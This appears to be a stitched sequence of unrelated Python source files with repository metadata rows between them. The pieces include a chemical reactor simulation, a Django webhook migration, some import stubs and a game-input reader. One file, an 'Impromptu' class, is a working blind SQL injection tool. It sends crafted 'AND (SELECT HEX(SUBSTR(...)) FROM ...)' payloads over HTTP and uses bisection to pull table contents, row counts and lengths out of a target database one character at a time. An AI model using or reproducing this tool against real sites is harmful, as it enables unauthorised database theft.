# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
# REVIEW
# *** convective flux between fluid-solid ***
# concentration
# Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
CosSpi_cat_gas = _Cs_r[0]
# dimensionless analysis: real value
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_gas)
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
# steady-state
dxdt_F = _convectiveTerm + _dispersionFluxC - _inwardFlux
dxdtMat[i][0][z] = dxdt_F
# REVIEW
### solid phase ###
# transfer from gas to solid surface and then reaction
# dimensionless analysis
# beta
# const
_alpha = rf/GaDii0[i]
_beta = MaTrCo[i]/GaDii_DiLeVa[i]
_DiLe = _alpha*_beta
_Ri = ri_r[:, i]
dxdtMat[i][1][z] = MoFli_z[i]*SpSuAr + _Ri
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# REVIEW
### solid phase ###
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# _Ts_r
# updated temperature in the gas-solid interface
Ts_r_cat_gas = _Ts_r[0]
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# BC1
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature in the catalyst surface [K]
# Ts_cat
# outward flux [kJ/m^2.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(Ts_r_cat_gas - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
# steady-state
dxdt_T = _convectiveTerm + _dispersionFluxT + _heTrBeGaSoTerm + _heatExchangeTerm
dxdtMat[indexT][0][z] = dxdt_T
# dC/dt list
# convert
# solid thermal conductivity - [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# overall heat of reaction - OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
# heat transfer coefficient - HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# loop vars
_alpha = rf/SoThCoEff_Conv
_beta = -1*HeTrCo_Conv/SoThCoEff_DiLeVa
_DiLe = _alpha*_beta
_H = (1-BeVoFr)*OvHeReT_Conv
# set
dxdtMat[indexT][1][z] = _H - _inwardFluxT
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
return dxdt
# FIXME
def modelReactions(P, T, y, CaBeDe):
'''
reaction rate expression list [kmol/m3.s]
args:
P: pressure [Pa]
T: temperature [K]
y: mole fraction
CaBeDe: catalyst bed density [kgcat/m^3 bed or particle]
output:
r: reaction rate at T,P [kmol/m^3.s]
'''
try:
# pressure [Pa]
# temperature [K]
# print("y", y)
# parameters
RT = CONST.R_CONST*T
# kinetic constant
# DME production
# [kmol/kgcat.s.bar2]
K1 = 35.45*MATH.exp(-1.7069e4/RT)
# [kmol/kgcat.s.bar]
K2 = 7.3976*MATH.exp(-2.0436e4/RT)
# [kmol/kgcat.s.bar]
K3 = 8.2894e4*MATH.exp(-5.2940e4/RT)
# adsorption constant [1/bar]
KH2 = 0.249*MATH.exp(3.4394e4/RT)
KCO2 = 1.02e-7*MATH.exp(6.74e4/RT)
KCO = 7.99e-7*MATH.exp(5.81e4/RT)
# equilibrium constant
Ln_KP1 = 4213/T - 5.752 * \
MATH.log(T) - 1.707e-3*T + 2.682e-6 * \
(MATH.pow(T, 2)) - 7.232e-10*(MATH.pow(T, 3)) + 17.6
KP1 = MATH.exp(Ln_KP1)
log_KP2 = 2167/T - 0.5194 * \
MATH.log10(T) + 1.037e-3*T - 2.331e-7*(MATH.pow(T, 2)) - 1.2777
KP2 = MATH.pow(10, log_KP2)
Ln_KP3 = 4019/T + 3.707 * \
MATH.log(T) - 2.783e-3*T + 3.8e-7 * \
(MATH.pow(T, 2)) - 6.56e-4/(MATH.pow(T, 3)) - 26.64
KP3 = MATH.exp(Ln_KP3)
# total concentration
# Ct = y(1) + y(2) + y(3) + y(4) + y(5) + y(6);
# mole fraction
yi_H2 = y[0]
yi_CO2 = y[1]
yi_H2O = y[2]
yi_CO = y[3]
yi_CH3OH = y[4]
yi_DME = y[5]
# partial pressure of H2 [bar]
PH2 = P*(yi_H2)*1e-5
# partial pressure of CO2 [bar]
PCO2 = P*(yi_CO2)*1e-5
# partial pressure of H2O [bar]
PH2O = P*(yi_H2O)*1e-5
# partial pressure of CO [bar]
PCO = P*(yi_CO)*1e-5
# partial pressure of CH3OH [bar]
PCH3OH = P*(yi_CH3OH)*1e-5
# partial pressure of CH3OCH3 [bar]
PCH3OCH3 = P*(yi_DME)*1e-5
# reaction rate expression [kmol/m3.s]
ra1 = PCO2*PH2
ra2 = 1 + (KCO2*PCO2) + (KCO*PCO) + MATH.sqrt(KH2*PH2)
ra3 = (1/KP1)*((PH2O*PCH3OH)/(PCO2*(MATH.pow(PH2, 3))))
r1 = K1*(ra1/(MATH.pow(ra2, 3)))*(1-ra3)*CaBeDe
ra4 = PH2O - (1/KP2)*((PCO2*PH2)/PCO)
r2 = K2*(1/ra2)*ra4*CaBeDe
ra5 = (MATH.pow(PCH3OH, 2)/PH2O)-(PCH3OCH3/KP3)
r3 = K3*ra5*CaBeDe
# result
# r = roundNum([r1, r2, r3], REACTION_RATE_ACCURACY)
r = [r1, r2, r3]
return r
except Exception as e:
print(e)
raise
| 36.068854
| 153
| 0.509205
| 32,970
| 322,167
| 4.884804
| 0.032575
| 0.00529
| 0.007339
| 0.00991
| 0.931594
| 0.919337
| 0.914065
| 0.907738
| 0.900219
| 0.893469
| 0
| 0.026659
| 0.391176
| 322,167
| 8,931
| 154
| 36.072892
| 0.794436
| 0.321616
| 0
| 0.882618
| 0
| 0.001325
| 0.051436
| 0.000401
| 0
| 0
| 0
| 0.001568
| 0
| 1
| 0.005564
| false
| 0
| 0.007154
| 0
| 0.018548
| 0.002915
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80a47af68f0509773d0846c9a45a5dff6469e34a
| 88
|
py
|
Python
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 4
|
2021-08-22T02:50:56.000Z
|
2021-11-15T23:41:17.000Z
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 2
|
2021-08-28T22:47:20.000Z
|
2021-08-30T03:37:42.000Z
|
uvi-bot/tests/__init__.py
|
cloudsecurityalliance/uvi-tools
|
58aa6c2bda890bd5e20d4f6025e7af55390b8bcd
|
[
"Apache-2.0"
] | 3
|
2021-06-30T00:58:08.000Z
|
2021-10-19T22:15:19.000Z
|
from .test_UVIRepo import *
from .test_UVIGithub import *
from .test_UVIIssue import *
| 17.6
| 29
| 0.784091
| 12
| 88
| 5.5
| 0.5
| 0.363636
| 0.424242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147727
| 88
| 4
| 30
| 22
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
03e81c30b60e74cb3d1008e129853793433c915b
| 2,320
|
py
|
Python
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,396
|
2017-09-07T04:56:02.000Z
|
2022-03-31T13:56:17.000Z
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,046
|
2017-09-07T09:30:46.000Z
|
2022-03-31T20:28:01.000Z
|
awx/main/migrations/0094_v360_webhook_mixin2.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 3,592
|
2017-09-07T04:14:31.000Z
|
2022-03-31T23:53:09.000Z
|
# Generated by Django 2.2.4 on 2019-09-12 14:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0093_v360_personal_access_tokens'),
]
operations = [
migrations.AddField(
model_name='job',
name='webhook_credential',
field=models.ForeignKey(
blank=True,
help_text='Personal Access Token for posting back the status to the service API',
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name='jobs',
to='main.Credential',
),
),
migrations.AddField(
model_name='job',
name='webhook_guid',
field=models.CharField(blank=True, help_text='Unique identifier of the event that triggered this webhook', max_length=128),
),
migrations.AddField(
model_name='job',
name='webhook_service',
field=models.CharField(
blank=True, choices=[('github', 'GitHub'), ('gitlab', 'GitLab')], help_text='Service that webhook requests will be accepted from', max_length=16
),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_credential',
field=models.ForeignKey(
blank=True,
help_text='Personal Access Token for posting back the status to the service API',
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name='workflowjobs',
to='main.Credential',
),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_guid',
field=models.CharField(blank=True, help_text='Unique identifier of the event that triggered this webhook', max_length=128),
),
migrations.AddField(
model_name='workflowjob',
name='webhook_service',
field=models.CharField(
blank=True, choices=[('github', 'GitHub'), ('gitlab', 'GitLab')], help_text='Service that webhook requests will be accepted from', max_length=16
),
),
]
| 36.825397
| 160
| 0.569397
| 237
| 2,320
| 5.438819
| 0.316456
| 0.083786
| 0.10706
| 0.125679
| 0.845617
| 0.845617
| 0.845617
| 0.704422
| 0.704422
| 0.704422
| 0
| 0.02046
| 0.325862
| 2,320
| 62
| 161
| 37.419355
| 0.803708
| 0.019397
| 0
| 0.821429
| 1
| 0
| 0.271007
| 0.014078
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.089286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff1f579e53077042cf2c9ca68cde2e7c192e90a0
| 77
|
py
|
Python
|
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
envs/walkers/__init__.py
|
WyomingWolf/rl_bot
|
6d462cd62a4c8f00c30f9d89bed34d2e583544b9
|
[
"MIT"
] | null | null | null |
from envs.walkers.bot_env import BotEnv
from envs.walkers.ant import AntEnv
| 19.25
| 39
| 0.831169
| 13
| 77
| 4.846154
| 0.692308
| 0.253968
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 77
| 3
| 40
| 25.666667
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
205dc52c53cea390ba2508a60f8059a05fb81d85
| 8,411
|
py
|
Python
|
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | null | null | null |
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | null | null | null |
classes/Impromptu.py
|
Sys-A501/MySQL-Impromptu
|
7a8b9a2c6af14385e4a16f5f7773c5915dd7f66c
|
[
"MIT"
] | 1
|
2020-03-11T09:52:31.000Z
|
2020-03-11T09:52:31.000Z
|
import httplib
class Impromptu(object):
def __init__(self):
pass
###########################################################
# Returns true if it positions contains the selected char #
###########################################################
def getChar(self, server, https, path, rNum, cNum, char, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
payload = "+AND+(SELECT+HEX(SUBSTR("+fieldName+","+str(cNum)+",1))+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")=HEX("+hex(ord(char))+")"
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print char+" = "+str(txtEval in text)
return (txtEval in text) == evl
pass #END function
######################################################
# Returns the selected position char using bisection #
######################################################
def getChar_bj(self, server, https, path, rNum, cNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
# - Printable chars only
maxVal = 127
minVal = 31
rVal = 0
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
#print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testChar(server, https, path, rNum, cNum, tmpVal, fieldName, table, evl, txtEval, queryComments, rLimit):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass #END if
pass #END while
return chr(rVal)
pass #END function
## - (bisection implementation) - ##################################
# Test a if value is greatter than selected char return the result #
####################################################################
def testChar(self, server, https, path, rNum, cNum, char, fieldName, table, evl, txtEval, queryComments, rLimit):
#print chr(char)
payload = "+AND+(SELECT+HEX(SUBSTR("+fieldName+","+str(cNum)+",1))+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>HEX("+str(char)+")"
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print str(char)+" = "+str(txtEval in text)
return (txtEval in text) == evl
pass
#############################
# Returns a row char length #
#############################
def getLength(server, https, path, rNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
if evl:
text = txtEval
pass #END if
count = 0;
while ((txtEval in text) == evl):
count += 1
payload = "+AND+(SELECT+LENGTH("+fieldName+")+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>"+str(count)
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text+" --> \n"+str((txtEval in text))
pass #END while
return count
pass #END function
#############################################
# Returns a row char length using bisection #
#############################################
def getLength_bj(self, server, https, path, rNum, fieldName, table, evl, txtEval, queryComments = '', rLimit = True):
rVal = 0;
if self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, 0) == False: # Testing if numRows =< 0
rVal = 0
pass
else:
initVal = 1
while self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, initVal): # Getting an upper limit
initVal *= 10
pass #END while
maxVal = initVal
minVal = 1
rVal = 1
if initVal != 1:
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
#print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testRowLength (server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, tmpVal):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass
pass #END while
pass #END if
pass #END if
return rVal
pass #END function
## - (bisection implementation) - ########################################
# Test a if value is greatter than row char length and return the result #
##########################################################################
def testRowLength (self, server, https, path, rNum, fieldName, table, evl, txtEval, queryComments, rLimit, count = 0):
if evl:
text = txtEval
pass #END if
payload = "+AND+(SELECT+LENGTH("+fieldName+")+FROM+"+table
if rLimit:
payload += "+LIMIT+"+str(rNum)+",1"
pass #END if
payload += ")>"+str(count)
payload += queryComments
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.connect();
conn.request('GET', req)
#print req
response = conn.getresponse()
text = response.read()
return ((txtEval in text) == evl)
pass #END fucntion
#######################
# Returns rows number #
#######################
def getRowsNum(server, https, path, fieldName, table, evl, txtEval, queryComments = ''):
print "Counting '"+fieldName+"' rows"
if evl:
text = txtEval
pass #END if
count = 0;
while ((txtEval in text) == evl):
payload = "+AND+(SELECT+COUNT("+fieldName+")+FROM+"+table+")+>+"+str(count)
payload += queryComments
print count,
req = path+payload
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
conn.connect();
##print req
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text+" --> \n"+str((txtEval in text))
count += 1
pass #END while
return count-1
pass #END function
#######################################
# Returns rows number using bisection #
#######################################
def getRowsNum_bj(self, server, https, path, fieldName, table, evl, txtEval, queryComments):
print "Counting '"+fieldName+"' rows"
rVal = 0;
if self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, 0) == False: # Testing if numRows =< 0
rVal = 0
pass
else:
initVal = 1
while self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, initVal): # Getting an upper limit
initVal *= 10
pass #END while
maxVal = initVal
minVal = 1
rVal = 1
if initVal != 1:
while maxVal != minVal: # turnning around
tmpVal = minVal+((maxVal-minVal)/2)
print "\n"+str(minVal)+", "+str(maxVal)
if tmpVal != minVal:
if self.testRowNum (server, https, path, fieldName, table, evl, txtEval, queryComments, tmpVal):
minVal = tmpVal
pass
else:
maxVal = tmpVal
pass #END if
pass
else:
rVal = maxVal
break
pass
pass #END while
pass #END if
pass #END if
return rVal
pass #END function
## - (bisection implementation) - ###################################
# Test a if value is greatter than row number and return the result #
#####################################################################
def testRowNum (self, server, https, path, fieldName, table, evl, txtEval, queryComments = '', count = 0):
if evl:
text = txtEval
pass #END if
payload = "+AND+(SELECT+COUNT("+fieldName+")+FROM+"+table+")+>+"+str(count)
payload += queryComments
print count,
req = path+payload
#print req
#if https:
# conn = httplib.HTTPSConnection(server)
#else:
conn = httplib.HTTPConnection(server)
#pass
#print req
conn.connect();
conn.request('GET', req)
response = conn.getresponse()
text = response.read()
#print text
return ((txtEval in text) == evl)
pass #END function
| 27.132258
| 145
| 0.575199
| 942
| 8,411
| 5.12845
| 0.112527
| 0.044918
| 0.049679
| 0.079487
| 0.890292
| 0.855723
| 0.83461
| 0.809356
| 0.809356
| 0.787001
| 0
| 0.006293
| 0.206515
| 8,411
| 309
| 146
| 27.220065
| 0.717561
| 0.190584
| 0
| 0.861538
| 0
| 0
| 0.049584
| 0.008151
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.220513
| 0.005128
| null | null | 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
205e93ae915d840145a7b88d4c7b5ef0660208a2
| 4,309
|
py
|
Python
|
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
read_input.py
|
NeiH2304/ProCon_ver_4
|
a51604bc8b1510971d981a1d0f06b9d3ff8494aa
|
[
"MIT"
] | null | null | null |
def read_state(file_name):
MAX_SIZE = 20
data = []
with open(file_name) as f:
score_matrix = []
h, w = map(int, f.readline().split())
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
score_matrix.append(array)
while(len(score_matrix) < MAX_SIZE):
score_matrix.append([0] * MAX_SIZE)
num_tresures = list(map(int, f.readline().split()))[0]
treasures = []
for j in range(num_tresures):
coord = list(map(int, f.readline().split()))
treasures.append(coord)
num_walls = list(map(int, f.readline().split()))[0]
coord_walls = []
for j in range(num_walls):
coord = list(map(int, f.readline().split()))
coord_walls.append(coord)
num_agens = list(map(int, f.readline().split()))[0]
coord_agens_of_team_A = []
coord_agens_of_team_B = []
for j in range(num_agens * 2):
coord = list(map(int, f.readline().split()))
# print(coord)
if(j < num_agens):
coord_agens_of_team_A.append(coord)
else:
coord_agens_of_team_B.append(coord)
conquer_matrix_1 = []
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
conquer_matrix_1.append(array)
while(len(conquer_matrix_1) < MAX_SIZE):
conquer_matrix_1.append([0] * MAX_SIZE)
conquer_matrix_2 = []
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
conquer_matrix_2.append(array)
while(len(conquer_matrix_2) < MAX_SIZE):
conquer_matrix_2.append([0] * MAX_SIZE)
turns = list(map(int, f.readline().split()))[0]
data = [h, w, score_matrix, treasures, coord_walls,
coord_agens_of_team_A, coord_agens_of_team_B,
[conquer_matrix_1, conquer_matrix_2], turns, num_agens]
return data
class Data():
def Read_Input(num_inputs = 1):
MAX_SIZE = 20
data = []
for i in range(num_inputs):
file_name = 'Input_File/inp_file_' + str(i) + '.txt'
with open(file_name) as f:
score_matrix = []
h, w = map(int, f.readline().split())
for i in range(h):
array = list(map(int, f.readline().split()))
while(len(array) < MAX_SIZE):
array.append(0)
score_matrix.append(array)
